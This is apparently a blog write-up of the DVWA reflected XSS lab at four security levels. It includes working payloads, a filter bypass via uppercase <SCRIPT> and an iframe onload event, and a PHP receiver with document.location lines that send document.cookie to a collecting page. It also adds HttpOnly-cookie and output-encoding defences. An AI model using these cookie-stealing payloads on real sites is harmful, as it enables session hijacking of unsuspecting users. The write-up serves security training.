[DVWA (d)] XSS reflected-type attack


Reflected XSS (Reflected Cross Site Scripting)

Overview:

A cross-site scripting attack is one in which a malicious intruder inserts data into the HTML of a remote web page. Users believe the page is trustworthy, but when the browser downloads the page the embedded script is interpreted. Because HTML allows scripting languages for simple interaction, an intruder can insert malicious HTML into a page by technical means, for example to harvest the information a forum keeps about its users (cookies); since a cookie may hold the complete user name and password information, the user's security suffers. A simple script such as the JavaScript alert(document.cookie) easily obtains user information: it pops up a message box containing the user's data. An intruder who uses a script to send that information to a page they control can, with a little analysis, obtain the user's sensitive information.

Categories of cross-site scripting attacks:

1. Persistent XSS, also known as stored XSS

2. Non-persistent XSS, also known as reflected XSS

3. DOM-XSS, based on the DOM (Document Object Model)

Of these, the persistent type is the most harmful. The other two do not yet seem to have widely used automated means of causing harm, but it is already possible to push the harm of the non-persistent type to its maximum, although the technical demands on the individual are relatively high.

Non-persistent cross-site vulnerabilities still count as "chicken-rib" (low-value) vulnerabilities, but progress has been made on how to expand the harm of this kind of vulnerability, and it has already been successfully exploited to cause no small damage. The day reflected XSS sheds its "chicken-rib hole" hat is not far off.


This post works through the four DVWA security levels. If something used along the way, such as HackBar, is unfamiliar, have a look at the earlier posts or leave a comment.


low:

I happened to be listening to music, so first I tried inserting the song player:

<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1305364671&auto=1&height=66"></iframe>

Oh ho, it works.

Now let's start:

1. Try alert

<script>alert("test")</script>

It pops up, so the input is reflected unfiltered.

2. Since that works, continue and grab the cookie

Write a PHP file (the receiver that records whatever arrives in the cookie parameter):

<?php
// receiver: append the value of ?cookie= to a local text file
$cookie = $_GET['cookie'];
file_put_contents('get_low_dvwa_cookie.txt', $cookie);
?>

Put it under the www folder.

3. Use the vulnerability to send the cookie to the PHP file just written:

<script>document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie</script>

You can type the code above into the input box, or put it in HackBar as name=<code...>; note that it has to be URL-encoded.

4. At this point you can see that the cookie has been obtained and saved to the file.

5. Use the cookie to log in [this part has not been studied yet; a hole to fill in later!]
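The cookie theft in steps 2 to 4 only works because the session cookie is readable from document.cookie. As an added defensive example (not code from the original post or from DVWA), the following PHP starts a session whose cookie carries the HttpOnly, Secure and SameSite attributes; with HttpOnly set, the document.cookie payload above no longer sees the session id. It assumes PHP 7.3 or later (array form of session_set_cookie_params) and that the site is served over HTTPS.

```php
<?php
// Added example (not from the original post or DVWA): start a PHP session
// whose cookie cannot be read by page scripts. With HttpOnly set, the
// document.cookie payloads in this walkthrough do not return the session id,
// so a reflected XSS cannot exfiltrate it that way.
// Assumes PHP >= 7.3 and an HTTPS origin.

declare(strict_types=1);

/**
 * Cookie parameters for the session cookie, kept in a function so they can
 * be inspected and unit-tested separately from session_start().
 */
function secure_session_cookie_params(): array
{
    return [
        'lifetime' => 0,       // browser-session cookie, discarded on close
        'path'     => '/',
        'domain'   => '',      // current host only
        'secure'   => true,    // only sent over HTTPS
        'httponly' => true,    // not exposed to document.cookie
        'samesite' => 'Lax',   // not sent on cross-site POSTs; also limits CSRF
    ];
}

function secure_session_start(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    // Reject session ids the server did not generate itself (anti-fixation).
    ini_set('session.use_strict_mode', '1');
    session_set_cookie_params(secure_session_cookie_params());
    session_start();
}

secure_session_start();
header('Content-Type: text/html; charset=UTF-8');
echo '<p>Session started with an HttpOnly, Secure, SameSite=Lax cookie.</p>';
```

HttpOnly is defence in depth, not a fix: the script injection itself is still there and can still act inside the page on the user's behalf. The real fix is output encoding of the reflected value, which is what the impossible level does.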


medium:

1. Try alert again; it no longer works.

2. Try with <SCRIPT> instead; that works.

3. View the source:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

So only the exact lowercase string <script> is removed; once we switch to uppercase it goes through. The XSS vulnerability is found, and from here on it is exactly the same as low.


high:

1. Try alert:

It does not work, and the page echoes back '>'.

2. Try mixed upper and lower case

Does not work either.

3. But the NetEase Cloud Music player from earlier still works:

<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1305364671&auto=1&height=66"></iframe>

4. So we can conclude that only the script tag is being handled!

Testing with <iframe onload=alert("test")> works.

5. This amounts to embedding new HTML through an iframe:

<iframe onload=document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie>

Success!


impossible:

// Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

No solution for now.


Afterword:

Some thoughts on the three questions at the end of that Hetian Cyber Security (合天网安) lesson:

1) What is the principle behind a cross-site vulnerability?

  The input is not processed appropriately. If it were handled the way the impossible level does it, the page would be well protected.

2) How does one generally hunt for cross-site vulnerabilities?

  alert, iframe, and so on.

3) If you found a cross-site vulnerability now, how would you exploit it?

  Collect cookies and log into the back end. That hole has already been dug; a practical write-up will be added later.
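To make the medium-level source and the answer to question 1 concrete, here is an added example (not code from the original post or from DVWA) that places the medium filter next to a proper output-encoding fix and runs both, from the command line, over the payloads tried in this walkthrough. The function names are this example's own; it assumes PHP 8.0 or later (str_contains).

```php
<?php
// Added example (not from the original post or DVWA): the medium-level filter
// beside an output-encoding fix, run over constructed inputs to show which
// ones still produce markup after each treatment. Assumes PHP >= 8.0.

declare(strict_types=1);

// The medium-level approach: delete one exact substring. Case variants and
// every other tag pass straight through.
function render_medium(string $name): string
{
    $name = str_replace('<script>', '', $name);
    return "<pre>Hello {$name}</pre>";
}

// The fix: encode for the HTML context the value lands in. '<', '>', '&',
// '"' and "'" become entities, so the browser displays the text instead of
// parsing it as markup. This is the same htmlspecialchars() call that the
// impossible level relies on.
function render_encoded(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<pre>Hello {$safe}</pre>";
}

// Crude check used only for this demonstration: after removing the fixed
// <pre>Hello ...</pre> wrapper, does anything from the input still contain a
// raw angle bracket? Encoded output never does.
function contains_markup(string $html_fragment): bool
{
    $inner = substr($html_fragment, strlen('<pre>Hello '), -strlen('</pre>'));
    return str_contains($inner, '<') || str_contains($inner, '>');
}

// Constructed inputs: one benign name plus the three payloads from the
// low, medium and high sections above.
$inputs = [
    'benign name'               => 'Wayne & Co <3',
    'lowercase script (low)'    => '<script>alert("test")</script>',
    'uppercase script (medium)' => '<SCRIPT>alert("test")</SCRIPT>',
    'iframe onload (high)'      => '<iframe onload=alert("test")>',
];

printf("%-27s %-14s %-16s\n", 'input', 'medium filter', 'htmlspecialchars');
foreach ($inputs as $label => $value) {
    printf(
        "%-27s %-14s %-16s\n",
        $label,
        contains_markup(render_medium($value)) ? 'markup leaks' : 'clean',
        contains_markup(render_encoded($value)) ? 'markup leaks' : 'clean'
    );
}
```

Run it with php on the command line: every row comes out as "markup leaks" under the medium filter and "clean" under htmlspecialchars(), including the benign name, which is still displayed correctly as text. The lesson matches the afterword's first answer: blacklisting known bad strings fails as soon as the attacker changes case or tag, whereas encoding on output removes the whole class of injection regardless of which tag is used.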


Origin www.cnblogs.com/wayne-tao/p/11074754.html